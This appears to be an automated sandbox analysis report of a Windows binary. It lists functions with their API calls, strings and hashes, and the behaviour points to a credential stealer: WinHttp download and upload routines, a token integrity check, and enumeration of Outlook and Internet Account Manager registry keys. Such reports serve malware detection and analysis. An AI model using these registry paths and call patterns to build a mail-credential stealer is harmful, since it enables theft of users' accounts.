                                                                                                    • Opcode ID: 6a7630da49cf8d5282b84b75713a96cf5be998fab270970491d69e3533a24b7c
                                                                                                    • Instruction ID: 479214f8d44ea07ff9a1ad6becd9a1226b0edc878cb2a4cc9ae60e24f50ce448
                                                                                                    • Opcode Fuzzy Hash: 6a7630da49cf8d5282b84b75713a96cf5be998fab270970491d69e3533a24b7c
                                                                                                    • Instruction Fuzzy Hash: D1D118B0D042489EDF25CFA9C8857EEBBB8AF19304F10415FE496B7282D7785648CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004371FA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 100timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004371FF
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,755524D0,00000000), ref: 0043721C
                                                                                                      • Part of subcall function 00412BD9: __EH_prolog.LIBCMT ref: 00412BDE
                                                                                                      • Part of subcall function 00413337: __EH_prolog.LIBCMT ref: 0041333C
                                                                                                      • Part of subcall function 00413337: std::locale::_Init.LIBCPMT ref: 0041335A
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0043736A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
                                                                                                    • String ID: 9}<)g}$T$%A
                                                                                                    • API String ID: 3259846166-174459869
                                                                                                    • Opcode ID: b3778d1821aca3890c57e4e293b17e6e05bbe9bc7304a9f8076132ac10da8c0c
                                                                                                    • Instruction ID: 162ebed1eb13c3b0278badf9aa4dc64885cc43935c5698f0d3ef241c67cc4b1f
                                                                                                    • Opcode Fuzzy Hash: b3778d1821aca3890c57e4e293b17e6e05bbe9bc7304a9f8076132ac10da8c0c
                                                                                                    • Instruction Fuzzy Hash: 3A418F71C04358CBDB15DFA9C944BEEBBB5AF49308F1081AED809B7241EB781A89CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042A224, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(0046DB80,00000000,00000015,0046DBA0,?), ref: 0042A244
                                                                                                    • StrStrIW.SHLWAPI(?,0047C394), ref: 0042A295
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0042A2B3
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0042A2C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeTask$CreateInstance
                                                                                                    • String ID: (
                                                                                                    • API String ID: 2903366249-3887548279
                                                                                                    • Opcode ID: ce4cd7f7648d056d8e8a876ce9c7a0421bd9f5a584195d27b53de379391fd91c
                                                                                                    • Instruction ID: 49c26595c2effa2261d274fccedc07f4d445ec10e3301bf20fc288ebb5b5a36d
                                                                                                    • Opcode Fuzzy Hash: ce4cd7f7648d056d8e8a876ce9c7a0421bd9f5a584195d27b53de379391fd91c
                                                                                                    • Instruction Fuzzy Hash: 7021F974F00219EFDB04DFA5E884D9EB7B9EF48704B5480AAE805E7250DB75AD44CB2A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043EFDD, Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(000000FF,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000,0041444D,?), ref: 0043EFE9
                                                                                                    • FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D), ref: 0043F019
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000), ref: 0043F026
                                                                                                    • FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D), ref: 0043F040
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000), ref: 0043F04D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$ErrorFileFirstLast$Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 569926201-0
                                                                                                    • Opcode ID: 7fc029a5f0421f4cafcf9f5ef5d09b28b31ed2e16f4ecc119996b2714d077cde
                                                                                                    • Instruction ID: 2e699ab520b179d43ad2bf4343934b09a901ed4888842c9946054f0494e0c7a6
                                                                                                    • Opcode Fuzzy Hash: 7fc029a5f0421f4cafcf9f5ef5d09b28b31ed2e16f4ecc119996b2714d077cde
                                                                                                    • Instruction Fuzzy Hash: 3601B531900189BBCB301F66DC0CC5B3F79EFCA721F10453AF668851E1D7B19851DA69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004344AA, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 276fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004344AF
                                                                                                    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00488780,0000000F,00000001), ref: 004344ED
                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00434511
                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 004345DF
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC
                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00434639
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 004346B1
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 00434718
                                                                                                    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00434748
                                                                                                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00434754
                                                                                                    • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00434769
                                                                                                    • WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00434794
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,CECED245,00000000), ref: 004347A9
                                                                                                    • GetLastError.KERNEL32 ref: 004347C4
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 004347CB
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 004347D5
                                                                                                    • CloseHandle.KERNEL32(?,00000001,00000000,00000002,00000080,00000000), ref: 004347DE
                                                                                                    • WinHttpCloseHandle.WINHTTP(?), ref: 004347E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
                                                                                                    • String ID: %99[^:]://%99[^/]%99[^]$GET
                                                                                                    • API String ID: 4006077129-3478069819
                                                                                                    • Opcode ID: bd1dbfffec416d325e8f45a1db24fcf4d5b4f06553ae7394f5709a60ea36cb02
                                                                                                    • Instruction ID: 7f1348a21265612ae21412d4864c76256cf8e41bc4be0fb22147dbfb47b544d7
                                                                                                    • Opcode Fuzzy Hash: bd1dbfffec416d325e8f45a1db24fcf4d5b4f06553ae7394f5709a60ea36cb02
                                                                                                    • Instruction Fuzzy Hash: 2AA17F71D00259AFDB11DFA0CD85BEEB7B8FF49304F1040AAE405A7241EB789E45CB6A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004340AE, Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 304COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004340B3
                                                                                                    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047935B,00000000), ref: 00434101
                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,?,?,?,0047935B,00000000), ref: 004341D0
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC
                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,?,?,?,0047935B,00000000), ref: 0043422D
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047935B,00000000), ref: 004342AF
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?,?,?,?,0047935B,00000000), ref: 00434320
                                                                                                    • _strlen.LIBCMT ref: 0043434D
                                                                                                    • _strlen.LIBCMT ref: 00434357
                                                                                                    • WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047935B,00000000), ref: 0043436D
                                                                                                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047935B,00000000), ref: 0043437E
                                                                                                    • WinHttpQueryDataAvailable.WINHTTP(00000000,00000000,?,?,?,0047935B,00000000), ref: 00434395
                                                                                                    • WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047935B,00000000), ref: 004343C0
                                                                                                    • GetLastError.KERNEL32(?,?,?,0047935B,00000000), ref: 00434478
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047935B,00000000), ref: 00434482
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047935B,00000000), ref: 00434489
                                                                                                    • WinHttpCloseHandle.WINHTTP(?,?,?,?,0047935B,00000000), ref: 00434493
                                                                                                    Strings
                                                                                                    • Content-Type: text/plain; charset=UTF-8, xrefs: 00434367
                                                                                                    • %99[^:]://%99[^/]%99[^], xrefs: 00434127
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableErrorH_prologLastQueryReadReceiveResponseSend
                                                                                                    • String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8
                                                                                                    • API String ID: 1550182571-3818427525
                                                                                                    • Opcode ID: 4d41133d20aedfb99b2a48779dfaab0e55e18e91acb825d02ae608269bdc4895
                                                                                                    • Instruction ID: f6a42a86f5f42bcb76b4ddb13d4285eca02b7aca3b6ba09dba9197e53e9a81a6
                                                                                                    • Opcode Fuzzy Hash: 4d41133d20aedfb99b2a48779dfaab0e55e18e91acb825d02ae608269bdc4895
                                                                                                    • Instruction Fuzzy Hash: E1C17E70D012199FDB14DFA5C985BEEBBB8EF09304F1040AEE805A7251DB789A84CF69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00435346, Relevance: 28.6, APIs: 3, Strings: 16, Instructions: 102stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004349A2: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 004349E3
                                                                                                      • Part of subcall function 004349A2: GetProcAddress.KERNEL32(00000000,?), ref: 00434A20
                                                                                                      • Part of subcall function 004349A2: FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 00434A54
                                                                                                      • Part of subcall function 00434E00: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E25
                                                                                                      • Part of subcall function 00434E00: RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00435370,00000001), ref: 00434EB6
                                                                                                      • Part of subcall function 00434E00: RegCloseKey.ADVAPI32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434EC3
                                                                                                      • Part of subcall function 00434ECD: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434EF4
                                                                                                      • Part of subcall function 00434ECD: RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434F1F
                                                                                                      • Part of subcall function 00434ECD: lstrlenW.KERNEL32(0043549A,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F36
                                                                                                      • Part of subcall function 00434ECD: lstrlenW.KERNEL32(?,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F43
                                                                                                      • Part of subcall function 00434ECD: lstrcpyW.KERNEL32 ref: 00434F64
                                                                                                      • Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434F70
                                                                                                      • Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,?), ref: 00434F7E
                                                                                                      • Part of subcall function 00434ECD: lstrcatW.KERNEL32(00000000,?), ref: 00434F8A
                                                                                                      • Part of subcall function 00434ECD: RegEnumKeyExW.ADVAPI32(0043549A,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434FC4
                                                                                                      • Part of subcall function 00434ECD: RegCloseKey.ADVAPI32(0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434FD9
                                                                                                      • Part of subcall function 0043592B: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
                                                                                                      • Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
                                                                                                      • Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
                                                                                                      • Part of subcall function 0043592B: RegCloseKey.ADVAPI32(00000100), ref: 004359EE
                                                                                                    • lstrlenW.KERNEL32(00000000,?,?,?,0043549A), ref: 004353A8
                                                                                                    • lstrcpyW.KERNEL32 ref: 004353C0
                                                                                                    • lstrcpyW.KERNEL32 ref: 004353CC
                                                                                                      • Part of subcall function 00434E00: lstrlenW.KERNEL32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E4B
                                                                                                      • Part of subcall function 00434E00: lstrcpyW.KERNEL32 ref: 00434E68
                                                                                                      • Part of subcall function 00434E00: lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434E74
                                                                                                      • Part of subcall function 00434E00: lstrcatW.KERNEL32(00000000,?), ref: 00434E82
                                                                                                      • Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 004353FF
                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 00435442
                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 004353ED
                                                                                                    • Software\Microsoft\Internet Account Manager, xrefs: 0043538E
                                                                                                    • \Accounts, xrefs: 004353C6
                                                                                                    • Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 0043545E
                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00435364
                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 0043540A
                                                                                                    • Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 00435434
                                                                                                    • Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 00435472
                                                                                                    • Outlook, xrefs: 00435389
                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 00435450
                                                                                                    • \Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00435370
                                                                                                    • Identities, xrefs: 0043537A
                                                                                                    • Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 00435426
                                                                                                    • Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 00435418
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
                                                                                                    • String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts$\Software\Microsoft\Internet Account Manager\Accounts
                                                                                                    • API String ID: 527226083-92925148
                                                                                                    • Opcode ID: 4f467f346dbf1ee6fe101150daef03d5d27cf591a87cd6da9a66bbec358481ae
                                                                                                    • Instruction ID: 0d555bd477462e5ae5348e1b232b1991ce146c984576671113c76f2dd29a40c2
                                                                                                    • Opcode Fuzzy Hash: 4f467f346dbf1ee6fe101150daef03d5d27cf591a87cd6da9a66bbec358481ae
                                                                                                    • Instruction Fuzzy Hash: 27310BB1950208BED704EBE6DDD3DEE73ACEF58748F60545FF00521182ABBD2E059629
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004641EE, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00463EA7: CreateFileW.KERNEL32(00000000,00000000,?,00464297,?,?,00000000,?,00464297,00000000,0000000C), ref: 00463EC4
                                                                                                    • GetLastError.KERNEL32 ref: 00464302
                                                                                                    • __dosmaperr.LIBCMT ref: 00464309
                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00464315
                                                                                                    • GetLastError.KERNEL32 ref: 0046431F
                                                                                                    • __dosmaperr.LIBCMT ref: 00464328
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00464348
                                                                                                    • CloseHandle.KERNEL32(0045A93D), ref: 00464495
                                                                                                    • GetLastError.KERNEL32 ref: 004644C7
                                                                                                    • __dosmaperr.LIBCMT ref: 004644CE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                    • Opcode ID: ae2176c8292bafb7d73a904bbf193ddb6ba473326339fa5daf4097211ca1d489
                                                                                                    • Instruction ID: 4268d31200a389006fd8fd956af786bf09120caabc753a0eab52de2409f61829
                                                                                                    • Opcode Fuzzy Hash: ae2176c8292bafb7d73a904bbf193ddb6ba473326339fa5daf4097211ca1d489
                                                                                                    • Instruction Fuzzy Hash: D5A11632A001549FDF19DF68DC517AE7BE1EF4A324F14015EF811AB392EB398912C75A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042032E, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 188filetimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _strcat.LIBCMT ref: 004203EC
                                                                                                    • wsprintfA.USER32 ref: 00420446
                                                                                                    • wsprintfA.USER32 ref: 00420467
                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 00420496
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00420508
                                                                                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 00420542
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00420552
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$wsprintf$CloseCreateHandleTimeWrite_strcat
                                                                                                    • String ID: %s%s$%s%s%s$:
                                                                                                    • API String ID: 840165387-3034790606
                                                                                                    • Opcode ID: f8e25584b0a1a6c02878d25e17f2aaafa4bf28eb325097db5c9ced26a15894f5
                                                                                                    • Instruction ID: e75abde7eae685be2b2f9ab9f80e574431accfd2092442307ffe520205e795b7
                                                                                                    • Opcode Fuzzy Hash: f8e25584b0a1a6c02878d25e17f2aaafa4bf28eb325097db5c9ced26a15894f5
                                                                                                    • Instruction Fuzzy Hash: 08615A30700228AFDB20DF14E880BEA77E9AF04354F50446BE98597293D7789EC6CF18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00438DFD, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
                                                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
                                                                                                    • GetLastError.KERNEL32 ref: 00438E3A
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
                                                                                                    • GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
                                                                                                    • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
                                                                                                    • GlobalFree.KERNEL32 ref: 00438E92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                                                                                                    • String ID: S-1-5-18
                                                                                                    • API String ID: 857934279-4289277601
                                                                                                    • Opcode ID: 313d5776834a8a810804749beb3a250ab7b62c37ce036a3a53597f76d94bb189
                                                                                                    • Instruction ID: 29b2e7db3b3389ff21f5b96232cbe853033b43f37d7ff0144f937ce0bd561e70
                                                                                                    • Opcode Fuzzy Hash: 313d5776834a8a810804749beb3a250ab7b62c37ce036a3a53597f76d94bb189
                                                                                                    • Instruction Fuzzy Hash: 94112E35E00214BBDB10ABA2DC09F9FBF78EF49755F104069F605E1060EBB89A05DB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00434ECD, Relevance: 15.1, APIs: 10, Instructions: 102stringregistryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434EF4
                                                                                                    • RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434F1F
                                                                                                    • lstrlenW.KERNEL32(0043549A,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F36
                                                                                                    • lstrlenW.KERNEL32(?,00000000,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434F43
                                                                                                    • lstrcpyW.KERNEL32 ref: 00434F64
                                                                                                    • lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434F70
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00434F7E
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 00434F8A
                                                                                                    • RegEnumKeyExW.ADVAPI32(0043549A,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00435384,Identities,00000001), ref: 00434FC4
                                                                                                    • RegCloseKey.ADVAPI32(0043549A,?,?,?,00435384,Identities,00000001,?,?,?,0043549A), ref: 00434FD9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3646165539-0
                                                                                                    • Opcode ID: f3da31941f67786af58abdc84a3d63bc59a35e599f2a3f33a84cac361793eba7
                                                                                                    • Instruction ID: 84fe12fb3e25c27bb54342457b29e1adbaab05e93512211763e3781aba143f04
                                                                                                    • Opcode Fuzzy Hash: f3da31941f67786af58abdc84a3d63bc59a35e599f2a3f33a84cac361793eba7
                                                                                                    • Instruction Fuzzy Hash: B2314171E00109BBDB109B91DC88EEF7BBCEF89744F14406AF405E2210EBB8AE45DA65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416EAD, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 322COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00416EB2
                                                                                                      • Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$Deallocate
                                                                                                    • String ID: .*-$$7>/($E@U$Y$]s9<)$i`qv
                                                                                                    • API String ID: 2428181759-1285848389
                                                                                                    • Opcode ID: b038320323b858f28b72bc78ec983e87d9e23bea36f0c9f0422d76fd931339c8
                                                                                                    • Instruction ID: 5c09770262b4dee08a45ab733f9034201edc935d23fd1d9822186e371322f0ec
                                                                                                    • Opcode Fuzzy Hash: b038320323b858f28b72bc78ec983e87d9e23bea36f0c9f0422d76fd931339c8
                                                                                                    • Instruction Fuzzy Hash: BCD1F330D04259CACF15DFA5D991AEDBBB1AF19304F2041AFE40A77282DB385B89CF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00457E01, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 177fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00457596: GetConsoleCP.KERNEL32(00000005,~eD,00000000), ref: 004575DE
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,00445098,00000000,00421A56,~eD,~eD,00000010,00445098,00000000,00000005,00421A56,00421A56,?), ref: 00457F52
                                                                                                    • GetLastError.KERNEL32(?,0044657E), ref: 00457F5C
                                                                                                    • __dosmaperr.LIBCMT ref: 00457FA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                                                                    • String ID: ~eD$~eD$~eD
                                                                                                    • API String ID: 251514795-1598461380
                                                                                                    • Opcode ID: 27ad540d65e50a43cb431455240b37a87264fc6fb909ff777adbe444ef2102e1
